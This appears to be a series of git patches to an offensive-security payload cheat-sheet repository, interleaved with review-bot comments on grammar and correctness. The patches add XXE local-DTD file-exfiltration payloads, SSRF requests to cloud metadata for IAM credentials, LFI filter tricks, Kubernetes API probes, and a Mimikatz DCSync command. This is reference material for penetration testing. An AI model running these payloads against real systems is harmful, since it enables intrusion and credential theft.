@@ -97,6 +98,33 @@ Host script results: List Nmap scripts : ls /usr/share/nmap/scripts/ ``` +## Spyse +* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/) + +* [Spyse Wrapper](https://github.com/zeropwn/spyse.py) + +#### Searching for subdomains +```bash +spyse -target xbox.com --subdomains +``` + +#### Reverse IP Lookup +```bash +spyse -target 52.14.144.171 --domains-on-ip +``` + +#### Searching for SSL certificates +```bash +spyse -target hotmail.com --ssl-certificates +``` +```bash +spyse -target "org: Microsoft" --ssl-certificates +``` +#### Getting all DNS records +```bash +spyse -target xbox.com --dns-all +``` + ## Masscan ```powershell @@ -170,4 +198,4 @@ bettercap -X --proxy --proxy-https -T ## References -* [TODO](TODO) \ No newline at end of file +* [TODO](TODO) From f2beb0dbbc998fe4d9f31a62aa7412564dbd728b Mon Sep 17 00:00:00 2001 From: Philippe Arteau Date: Tue, 1 Oct 2019 18:22:42 -0400 Subject: [PATCH 059/222] Add local DTD section to the XXE Injection page --- XXE Injection/README.md | 43 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 378c8c29..58017175 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
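Review bot: the Spyse section skips a heading level (`####` directly under `##`, where sibling sections use `###`), its fences are ```bash where the rest of this file uses ```powershell, and the examples query real third-party names (`xbox.com`, `hotmail.com`, `52.14.144.171`, `"org: Microsoft"`); use `example.com`-style placeholders as the surrounding sections do. The lead-in "for detailed info is better to check" should read "for details see", and the bullet for the `spyse` command should say it comes from the linked Python wrapper, which the commit message states but the page does not.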
@@ -288,6 +288,47 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) + +## XXE with local DTD + +In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: +```xml +]> +&test; +``` + +If error based exfiltration is possible, you can still rely on a local DTD to do concatenation tricks. Payload to confirm that error message include filename. + +```xml + + + %local_dtd; +]> + +``` + +Assuming payloads such as the previous return a verbose error. You can start pointing to local DTD. With an found DTD, you can submit payload such as the following payload. The content of the file will be place in the error message. + +```xml + + + + "> + %eval; + %error; + '> + + %local_dtd; +]> + +``` + +[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + + ## XXE in exotic files ### XXE inside SVG @@ -341,6 +382,7 @@ JPG (experimental) GIF (experimental) ``` + ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) @@ -360,3 +402,4 @@ GIF (experimental) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) +- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) From e180d1f7e62bc17e7361faa7fdb693070b174c00 Mon Sep 17 00:00:00 2001 
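Review bot: grammar in the new "XXE with local DTD" section: "In some case" should be "In some cases", "With an found DTD" should be "With a found DTD", "will be place in" should be "will be placed in", and "Payload to confirm that error message include filename" should be "A payload to confirm that the error message includes the file name". The explanation should also say plainly that the DTD referenced by `%local_dtd;` must already exist on the target's filesystem, which is the reason the GoSecure payload list is linked. The new reference uses a `-` bullet where the rest of the list uses `*`, and the hunk adds stray blank lines before `## XXE in exotic files` and `## References`.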
From: marcan2020 Date: Wed, 2 Oct 2019 20:09:41 -0400 Subject: [PATCH 060/222] Fix dead youtube link --- Web Cache Deception/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index c45fdfca..097c86aa 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -22,7 +22,7 @@ 5. The content of the cache is displayed Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page -[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8) +[![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093) ## Methodology 2 @@ -55,4 +55,4 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) * [Web Caching - SI9INT](https://si9int.sh/article/6) -* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) \ No newline at end of file +* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) From 4f38666c354e8f641e9cf76b70d56dae0720d4d7 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 2 Oct 2019 20:23:37 -0400 Subject: [PATCH 061/222] Add .NET references --- Insecure Deserialization/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index aa058259..514fd13e 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md 
@@ -12,6 +12,7 @@ Check the following sub-sections, located in other files : ## References * [Github - ysoserial](https://github.com/frohoff/ysoserial) +* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) @@ -25,4 +26,5 @@ Check the following sub-sections, located in other files : * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals -* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) \ No newline at end of file +* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) +* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh From 920da73bd7714fd8bbc712d480f59bc07fb83f21 Mon Sep 17 00:00:00 2001 From: marcan2020 Date: Wed, 2 Oct 2019 21:24:53 -0400 Subject: [PATCH 062/222] Add Angular automatic sanitization --- XSS Injection/XSS in Angular.md | 46 +++++++++++++++++++++++++++++++-- 1 file changed, 44 insertions(+), 2 deletions(-) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 61b3af58..21302e88 100644 --- a/XSS Injection/XSS in Angular.md 
+++ b/XSS Injection/XSS in Angular.md @@ -1,8 +1,10 @@ # XSS in Angular +## Client Side Template Injection + The following payloads are based on Client Side Template Injection. -## Stored/Reflected XSS - Simple alert +### Stored/Reflected XSS - Simple alert > Angular as of version 1.6 have removed the sandbox altogether @@ -148,7 +150,7 @@ Angular 1.0.1 - 1.1.5 and Vue JS ``` -## Blind XSS +### Blind XSS 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) @@ -253,7 +255,47 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (Po }} ``` +## Automatic Sanitization + +> To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values. + +However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods: + +- bypassSecurityTrustHtml +- bypassSecurityTrustScript +- bypassSecurityTrustStyle +- bypassSecurityTrustUrl +- bypassSecurityTrustResourceUrl + +Example of a component using the unsecure method `bypassSecurityTrustUrl`: + +``` +import { Component, OnInit } from '@angular/core'; + +@Component({ + selector: 'my-app', + template: ` +

An untrusted URL:

+

Click me

+

A trusted URL:

+

Click me

+ `, +}) +export class App { + constructor(private sanitizer: DomSanitizer) { + this.dangerousUrl = 'javascript:alert("Hi there")'; + this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl); + } +} +``` + +![XSS](https://angular.io/generated/images/guide/security/bypass-security-component.png) + +When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application. + ## References - [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) - [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) +- [Angular Security](https://angular.io/guide/security) +- [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b) From 357658371f718329daa24a9d344264bf8fe93145 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 6 Oct 2019 20:59:58 +0200 Subject: [PATCH 063/222] SSRF URL for Google Cloud --- Methodology and Resources/Windows - Privilege Escalation.md | 5 ++++- Server Side Request Forgery/README.md | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8205602a..bf2b67cf 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
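Review bot: the component example will not compile as shown: `DomSanitizer` is used in the constructor but only `Component, OnInit` are imported from `@angular/core`, and `DomSanitizer` lives in `@angular/platform-browser`; `dangerousUrl` and `trustedUrl` are assigned but never declared as class properties, and `OnInit` is imported but not implemented. Add `import { DomSanitizer, SafeUrl } from '@angular/platform-browser';`, declare the two fields, and tag the fence as ```typescript. "unsecure method" should be "insecure method". The closing code-review sentence would be more useful with the concrete check it implies: search for `bypassSecurityTrust` and confirm that each argument is a constant rather than request- or user-derived data.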
@@ -543,6 +543,8 @@ The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windo ```powershell wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ +wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ + gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` @@ -869,4 +871,5 @@ python2 send_and_execute.py 10.0.0.1 revshell.exe * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) -* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) \ No newline at end of file +* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) +* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 03183561..20a8878b 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -455,6 +455,8 @@ Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-ap ### SSRF URL for Google Cloud +:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15. + Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" ```powershell 
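Review bot: in the `Windows - Privilege Escalation.md` hunk the added `wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """` line is the command directly above it with the `findstr /i "Auto"` filter removed and the column order changed, but nothing tells the reader why both are listed; a trailing comment such as `# all services, not only auto-start` on the new line would make the distinction explicit.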
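Review bot: the warning `Google is shutting down support for usage of the **v1 metadata service** on January 15.` in the `Server Side Request Forgery/README.md` hunk gives no year, so it becomes unreadable a few months after it is written; state the full date and link the announcement so readers can tell whether the v1 endpoints listed below it are still expected to answer.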
From 9f463d156b96de4fa5049964c579c02dae33f09f Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 9 Oct 2019 16:53:34 +0200 Subject: [PATCH 064/222] little changes - fix exploits ToC anchor - add nosqlilab --- NoSQL Injection/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 3714a3f2..b52f6bfa 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -5,7 +5,7 @@ ## Summary * [Tools](#tools) -* [Exploit](exploits) +* [Exploit](#exploits) * [Authentication Bypass](#authentication-bypass) * [Extract length information](#extract-length-information) * [Extract data information](#extract-data-information) @@ -18,6 +18,7 @@ ## Tools * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) +* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) ## Exploit From 03d02ccdd62241c5e3f5e842d9ef05180ee50d7a Mon Sep 17 00:00:00 2001 From: Ali Yazdani Date: Fri, 11 Oct 2019 12:56:22 +0200 Subject: [PATCH 065/222] Create readme.md Adding Kubernetes file --- Kubernetes/readme.md | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 Kubernetes/readme.md diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md new file mode 100644 index 00000000..8ab713bb --- /dev/null +++ b/Kubernetes/readme.md 
@@ -0,0 +1,33 @@ +Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. + +### API addresses that you should know *(External network visibility)* +--- +#### - cAdvisor +``` +curl -k https://:4194 +``` +#### - Insecure API server +``` +curl -k https://:8080 +``` +#### - Secure API Server +``` +curl -k https://:(8|6)443/swaggerapi +curl -k https://:(8|6)443/healthz +curl -k https://:(8|6)443/api/v1 +``` +#### - etcd API +``` +curl -k https://:2379 +curl -k https://:2379/version +``` +#### - Kubelet API +``` +curl -k https://:10250 +curl -k https://:10250/metrics +curl -k https://:10250/pods +``` +#### - kubelet (Read only) +``` +curl -k https://:10255 +``` From 05b3e13098ce05f21116d9127175e64204a22bb9 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 12 Oct 2019 13:30:52 +0200 Subject: [PATCH 066/222] SSRF for ECS --- Server Side Request Forgery/README.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 20a8878b..0c615323 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -31,6 +31,7 @@ * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) + * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) 
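Review bot: every `curl` target in the new `Kubernetes/readme.md` reads `https://:PORT`, so the host placeholder between the scheme and the port has been lost (most likely an angle-bracket placeholder swallowed by markdown rendering); use a plain token such as `NODE_IP` that survives rendering. Two of the listed endpoints are also plain HTTP, not TLS: the port described as `Insecure API server` (8080) and the `kubelet (Read only)` port 10255 are unencrypted listeners (as is cAdvisor on 4194), so `https://` will not connect to them. `(8|6)443` is regex notation that `curl` takes literally; either list both ports or explain the notation.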
@@ -421,6 +422,15 @@ E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugi E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/` +### SSRF URL for AWS ECS + +If you have an SSRF with file system access on an ECS instance, try extracting `/proc/self/environ` to get UUID. + +```powershell +curl http://169.254.170.2/v2/credentials/ +``` + +This way you'll extract IAM keys of the attached role ### SSRF URL for AWS Elastic Beanstalk From f0af3b4f4dc1c533ca81b5acc8188305e43ea59c Mon Sep 17 00:00:00 2001 From: OOP Date: Tue, 15 Oct 2019 23:18:07 +0700 Subject: [PATCH 067/222] Update Active Directory Attack.md --- Methodology and Resources/Active Directory Attack.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f48597e4..3b790122 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -458,7 +458,7 @@ Converting kirbi => ccache ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine accound password (key) from the KDC +Forging a TGS require machine accound password (key) or NTLM hash from the KDC ```powershell # Create a ticket for the service 
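Review bot: the `### SSRF URL for AWS ECS` hunk tells the reader to extract a UUID from `/proc/self/environ`, but the URL `http://169.254.170.2/v2/credentials/` then ends without any placeholder for it, so the request is incomplete as written; write the path as `.../v2/credentials/UUID` (or another placeholder that survives rendering) and name the environment variable the UUID comes from. The closing sentence `This way you'll extract IAM keys of the attached role` lacks a full stop, and the fence is tagged `powershell` for a `curl` command.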
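Review bot: the rewritten line `Forging a TGS require machine accound password (key) or NTLM hash from the KDC` in the Silver Tickets hunk keeps two typos from the original while touching it: `require` should be `requires` and `accound` should be `account`; since the line is being changed anyway, fix both.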
@@ -988,4 +988,4 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) -* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) \ No newline at end of file +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) From 52d02cea63133e15a2679389681560c465128fe2 Mon Sep 17 00:00:00 2001 From: Ali Yazdani Date: Wed, 16 Oct 2019 14:45:42 +0200 Subject: [PATCH 068/222] Update readme.md Add some related security tools. --- Kubernetes/readme.md | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 8ab713bb..7971af27 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -1,4 +1,4 @@ -Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. +> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. ### API addresses that you should know *(External network visibility)* --- 
@@ -31,3 +31,12 @@ curl -k https://:10250/pods ``` curl -k https://:10255 ``` +---- +### Tools for detecting misconfigurations in Kubernetes: +--- + +* [kubeaudit](https://github.com/Shopify/kubeaudit). kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: run the container as a non-root user, use a read only root filesystem, drop scary capabilities, don't add new ones, don't run privileged, ... +* [kubesec.io](https://kubesec.io/). Security risk analysis for Kubernetes resources. +* [kube-bench](https://github.com/aquasecurity/kube-bench). kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). + +* [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. From 83caef8ee12dadbe71b2243c8f7000681aa148a8 Mon Sep 17 00:00:00 2001 From: Alex Zeecka Date: Thu, 17 Oct 2019 17:40:59 +0200 Subject: [PATCH 069/222] Add filter iconv utf16 LFI bypass tricks --- File Inclusion/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 29fbf59d..cfa22c28 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -122,6 +122,7 @@ The part "php://filter" is case insensitive ```powershell http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php +http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php ``` 
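Review bot: `Learn Kubernetes using interactive broser-based scenarios` has a typo (`browser-based`), and the new section wraps its heading in two horizontal rules (`----` above, `---` below) with inconsistent dash counts; one rule, or none, matching the `### API addresses` heading above reads better. The katacoda entry is also separated from the other three tools by a blank line, unlike its siblings, and a learning course sits oddly under a heading that promises misconfiguration detection tools.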
@@ -403,4 +404,4 @@ Then crack the hashes inside in order to login via SSH on the machine. * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) \ No newline at end of file +* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) From 8eae039a28a14e867920b8317f4c4801af703860 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 17 Oct 2019 21:13:04 +0200 Subject: [PATCH 070/222] netdoc:// wrapper for Java SSRF --- Server Side Request Forgery/README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 0c615323..6293ec84 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -28,6 +28,7 @@ * [tftp://](#tftp) * [ldap://](#ldap) * [gopher://](#gopher) + * [netdoc://](#netdoc) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) 
@@ -345,6 +346,14 @@ Content of evil.com/redirect.php: ?> ``` +### Netdoc + +Wrapper for Java when your payloads struggle with "\n" and "\r" characters. + +```powershell +ssrf.php?url=gopher://127.0.0.1:4242/DATA +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) @@ -657,4 +666,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) -- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) \ No newline at end of file +- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file From 7159a3ded38448d9b32e75ea55d2a4bff57b34a2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 18 Oct 2019 00:07:09 +0200 Subject: [PATCH 071/222] RODC dcsync note + Dumping AD Domain summary --- .../Active Directory Attack.md | 17 +++++++++++++++++ Server Side Request Forgery/README.md | 1 + 2 files changed, 18 insertions(+) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3b790122..af91b3fa 100644 --- a/Methodology and Resources/Active Directory Attack.md 
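Review bot: the new `### Netdoc` section introduces the `netdoc://` wrapper, but its only example, `ssrf.php?url=gopher://127.0.0.1:4242/DATA`, uses `gopher://`, so the snippet does not demonstrate the wrapper that the heading and the TOC entry `* [netdoc://](#netdoc)` promise; the example should use the `netdoc:` scheme. The sentence `Wrapper for Java when your payloads struggle with "\n" and "\r" characters.` would also benefit from saying which Java URL handler exposes it and why those characters are an issue.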
+++ b/Methodology and Resources/Active Directory Attack.md @@ -8,6 +8,11 @@ * [Open Shares](#open-shares) * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) + * Using ndtsutil + * Using Vshadow + * Using vssadmin + * Using DiskShadow + * Using Mimikatz DCSync * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) @@ -378,6 +383,17 @@ cme smb 10.10.0.202 -u username -p password --ntds vss cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default ``` +#### Using Mimikatz DCSync + +Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. + +```powershell +mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt +``` + +:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. + + ### Password in AD User comment ```powershell @@ -989,3 +1005,4 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) \ No newline at end of file 
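Review bot: in the summary hunk the five new sub-bullets (`Using ndtsutil`, `Using Vshadow`, `Using vssadmin`, `Using DiskShadow`, `Using Mimikatz DCSync`) are plain text while every other entry is a link, so they do not navigate anywhere, and `ndtsutil` is misspelt (`ntdsutil`). In the `#### Using Mimikatz DCSync` hunk, the context lines directly above show `cme smb ... --ntds drsuapi #default`, which is the same replication mechanism; a one-line cross-reference would tie the two together, and the RODC warning is a good defensive caveat to keep.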
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 6293ec84..46070c93 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -52,6 +52,7 @@ - [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) - [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) +- [SSRF Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) ## Payloads with localhost From ed252df92e25bea32e62b950fc5f97b72478ddb2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 13:25:06 +0200 Subject: [PATCH 072/222] krb5.keytab + credential use summary --- .../Active Directory Attack.md | 39 +++++++++- .../Windows - Mimikatz.md | 5 ++ .../Windows - Using credentials.md | 76 +++++++++++++------ Server Side Template Injection/README.md | 1 